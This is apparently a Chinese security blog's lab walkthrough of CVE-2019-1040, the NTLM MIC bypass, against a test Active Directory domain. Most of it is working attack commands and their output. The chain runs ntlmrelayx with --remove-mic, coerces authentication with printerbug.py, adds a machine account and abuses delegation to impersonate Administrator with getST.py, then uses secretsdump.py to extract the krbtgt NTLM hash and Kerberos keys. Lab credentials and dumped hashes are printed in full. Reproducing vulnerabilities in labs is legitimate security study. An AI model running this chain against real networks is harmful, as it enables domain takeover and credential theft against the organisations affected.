鸢语数安

菜单

Administrator
发布于 2025-06-04 / 9 阅读
0
0

5.2 CVE-2019-1040 NTLM MIC绕过漏洞

#内网安全

影响范围:https://nsfocusglobal.com/windows-ntlm-tampering-vulnerability-cve-2019-1040-threat-alert/

一、漏洞复现

1、Exchange

域控:10.10.4.8

Exchange服务器:10.10.4.5

在Windows Server 2016和WinServer-2019-17763.379成功复现

监听请求:

(base) ┌──(root㉿Kali)-[~/tools]
└─# ntlmrelayx.py --remove-mic --escalate-user hack -t ldap://10.10.4.2 -smb2support --no-dump -debug

printbug发起中继

(base) ┌──(root㉿Kali)-[~/tools/krbrelayx]
└─# python3 printerbug.py sec/hack:"Az123456@"@10.10.4.5 10.10.4.10
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Attempting to trigger authentication via rprn RPC at 10.10.4.5
[*] Bind OK
[*] Got handle
RPRN SessionError: code: 0x6ab - RPC_S_INVALID_NET_ADDR - The network address is invalid.
[*] Triggered RPC backconnect, this may or may not have worked

(base) ┌──(root㉿Kali)-[~/tools/krbrelayx]
└─#

成功被赋予DCSync权限

└─# ntlmrelayx.py --remove-mic --escalate-user hack -t ldap://10.10.4.8 -smb2support --no-dump -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /root/miniconda3/lib/python3.12/site-packages/impacket
.............
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.4.5, attacking target ldap://10.10.4.8
[*] Authenticating against ldap://10.10.4.8 as SEC/EXCHANGE$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[+] User is a member of: []
[*] All targets processed!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.10.4.5 controlled, but there are no more targets left!
[+] User is a member of: [DN: CN=Domain Computers,CN=Users,DC=sec,DC=local - STATUS: Read - READ TIME: 2025-06-25T01:53:16.425120
    distinguishedName: CN=Domain Computers,CN=Users,DC=sec,DC=local
    name: Domain Computers
    objectSid: S-1-5-21-2066713137-2133816201-3751750268-515
]
[*] All targets processed!
[*] SMBD-Thread-8 (process_request_thread): Connection from 10.10.4.5 controlled, but there are no more targets left!

secretdump测试

(base) ┌──(root㉿Kali)-[~/tools]
└─# secretsdump.py sec.local/hack:"Az123456@"@10.10.4.2 -just-dc-user "sec\krbtgt"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1258230d20deb8fa8c0ee72e014ae813:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:f17ecd5329b2b676b5737a7e40c5cd26337048e048b09663ceef99178afff9d8
krbtgt:aes128-cts-hmac-sha1-96:48387c994c399862ae5ef5a7c86f0c8e
krbtgt:des-cbc-md5:512a436789e32394
[*] Cleaning up...

(base) ┌──(root㉿Kali)-[~/tools]
└─#

2、攻击域控

需要两台域控,一台用于触发printbug,一台中继LDAP流量执行高权限操作

2.1 支持LDAPS

监听

(base) ┌──(root㉿Kali)-[~/test]
└─# ntlmrelayx.py --remove-mic --escalate-user hack -t ldaps://10.10.4.8 -smb2support --no-dump -debug

printbug

(base) ┌──(root㉿Kali)-[~/tools/krbrelayx]
└─# python3 printerbug.py sec/hack:"Az123456@"@10.10.4.2 10.10.4.10
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Attempting to trigger authentication via rprn RPC at 10.10.4.2
[*] Bind OK
[*] Got handle
RPRN SessionError: code: 0x6ab - RPC_S_INVALID_NET_ADDR - The network address is invalid.
[*] Triggered RPC backconnect, this may or may not have worked

中继,会自动创建机器账户

└─# ntlmrelayx.py --remove-mic --escalate-user hack -t ldaps://10.10.4.8 -smb2support --no-dump -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /root/miniconda3/lib/python3.12/site-packages/impacket
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
..........
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.4.2, attacking target ldaps://10.10.4.8
[*] Authenticating against ldaps://10.10.4.8 as SEC/WIN2019-DC1$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] All targets processed!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.10.4.2 controlled, but there are no more targets left!
[*] All targets processed!
[*] SMBD-Thread-8 (process_request_thread): Connection from 10.10.4.2 controlled, but there are no more targets left!
[+] User is a member of: [DN: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=sec,DC=local - STATUS: Read - READ TIME: 2025-06-25T02:07:42.620158
    name: Pre-Windows 2000 Compatible Access
    objectSid: S-1-5-32-554
, DN: CN=Denied RODC Password Replication Group,CN=Users,DC=sec,DC=local - STATUS: Read - READ TIME: 2025-06-25T02:07:42.620250
    name: Denied RODC Password Replication Group
    objectSid: S-1-5-21-2066713137-2133816201-3751750268-572
, DN: CN=Cert Publishers,CN=Users,DC=sec,DC=local - STATUS: Read - READ TIME: 2025-06-25T02:07:42.620315
    name: Cert Publishers
    objectSid: S-1-5-21-2066713137-2133816201-3751750268-517
]
[+] User is a member of: [DN: CN=Domain Controllers,CN=Users,DC=sec,DC=local - STATUS: Read - READ TIME: 2025-06-25T02:07:42.622590
    distinguishedName: CN=Domain Controllers,CN=Users,DC=sec,DC=local
    name: Domain Controllers
    objectSid: S-1-5-21-2066713137-2133816201-3751750268-516
]

2.2 不支持LDAP

添加机器用户

(base) ┌──(root㉿Kali)-[~/tools]
└─# addcomputer.py  -computer-name 'machine1$' -computer-pass "Az123456@"  -dc-ip 10.10.4.2 sec.local/hack:"Az123456@" -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /root/miniconda3/lib/python3.12/site-packages/impacket
[*] Opening domain SEC...
[*] Successfully added machine account machine1$ with password Az123456@.

监听

(base) ┌──(root㉿Kali)-[~/test]
└─# ntlmrelayx.py --remove-mic -t ldap://10.10.4.8 -smb2support --no-dump --delegate-access --escalate-user machine1\$ -debug

printbug

(base) ┌──(root㉿Kali)-[~/tools/krbrelayx]
└─# python3 printerbug.py sec/hack:"Az123456@"@10.10.4.2 10.10.4.10
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Attempting to trigger authentication via rprn RPC at 10.10.4.2
[*] Bind OK
[*] Got handle
RPRN SessionError: code: 0x6ab - RPC_S_INVALID_NET_ADDR - The network address is invalid.
[*] Triggered RPC backconnect, this may or may not have worked

中继

(base) ┌──(root㉿Kali)-[~/test]
└─# ntlmrelayx.py --remove-mic -t ldap://10.10.4.8 -smb2support --no-dump --delegate-access --escalate-user machine1\$ -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /root/miniconda3/lib/python3.12/site-packages/impacket
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
......
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled

[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.4.2, attacking target ldap://10.10.4.8
[*] Authenticating against ldap://10.10.4.8 as SEC/WIN2019-DC1$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] All targets processed!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.10.4.2 controlled, but there are no more targets left!
[*] All targets processed!
[*] SMBD-Thread-8 (process_request_thread): Connection from 10.10.4.2 controlled, but there are no more targets left!
[+] User is a member of: [DN: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=sec,DC=local - STATUS: Read - READ TIME: 2025-06-25T02:11:42.875859
    name: Pre-Windows 2000 Compatible Access
    objectSid: S-1-5-32-554
, DN: CN=Denied RODC Password Replication Group,CN=Users,DC=sec,DC=local - STATUS: Read - READ TIME: 2025-06-25T02:11:42.875904
    name: Denied RODC Password Replication Group
    objectSid: S-1-5-21-2066713137-2133816201-3751750268-572
, DN: CN=Cert Publishers,CN=Users,DC=sec,DC=local - STATUS: Read - READ TIME: 2025-06-25T02:11:42.875941
    name: Cert Publishers
    objectSid: S-1-5-21-2066713137-2133816201-3751750268-517
]
[+] User is a member of: [DN: CN=Domain Controllers,CN=Users,DC=sec,DC=local - STATUS: Read - READ TIME: 2025-06-25T02:11:42.877919
    distinguishedName: CN=Domain Controllers,CN=Users,DC=sec,DC=local
    name: Domain Controllers
    objectSid: S-1-5-21-2066713137-2133816201-3751750268-516
]
[*] Delegation rights modified succesfully!
[*] machine1$ can now impersonate users on WIN2019-DC1$ via S4U2Proxy

以Administrator身份申请访问WIN2019-DC1机器的CIFS票据

(base) ┌──(root㉿Kali)-[~/tools/impacket]
└─# getST.py -spn cifs/WIN2019-DC1.sec.local sec/machine1\$:"Az123456@" -dc-ip 10.10.4.2 -impersonate administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
/root/miniconda3/bin/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/root/miniconda3/bin/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/root/miniconda3/bin/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/root/miniconda3/bin/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_WIN2019-DC1.sec.local@SEC.LOCAL.ccache

secretdump

(base) ┌──(root㉿Kali)-[~/tools/impacket]
└─# export KRB5CCNAME=administrator@cifs_WIN2019-DC1.sec.local@SEC.LOCAL.ccache

(base) ┌──(root㉿Kali)-[~/tools/impacket]
└─# secretsdump.py -k -no-pass WIN2019-DC1.sec.local  -just-dc-user "sec\krbtgt" -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /root/miniconda3/lib/python3.12/site-packages/impacket
[+] Using Kerberos Cache: administrator@cifs_WIN2019-DC1.sec.local@SEC.LOCAL.ccache
[+] Domain retrieved from CCache: sec
[+] Returning cached credential for CIFS/WIN2019-DC1.SEC.LOCAL@SEC.LOCAL
[+] Using TGS from cache
[+] Changing sname from cifs/WIN2019-DC1.sec.local@SEC.LOCAL to CIFS/WIN2019-DC1.SEC.LOCAL@SEC and hoping for the best
[+] Username retrieved from CCache: administrator
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Calling DRSCrackNames for sec\krbtgt
[+] Calling DRSGetNCChanges for {1fe9dde2-5865-4607-8f43-73dc969fa65a}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=sec,DC=local
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1258230d20deb8fa8c0ee72e014ae813:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:f17ecd5329b2b676b5737a7e40c5cd26337048e048b09663ceef99178afff9d8
krbtgt:aes128-cts-hmac-sha1-96:48387c994c399862ae5ef5a7c86f0c8e
krbtgt:des-cbc-md5:512a436789e32394
[*] Cleaning up...

二、抓包分析

5.3 CVE-2020-1472...
4.11 域林渗透

评论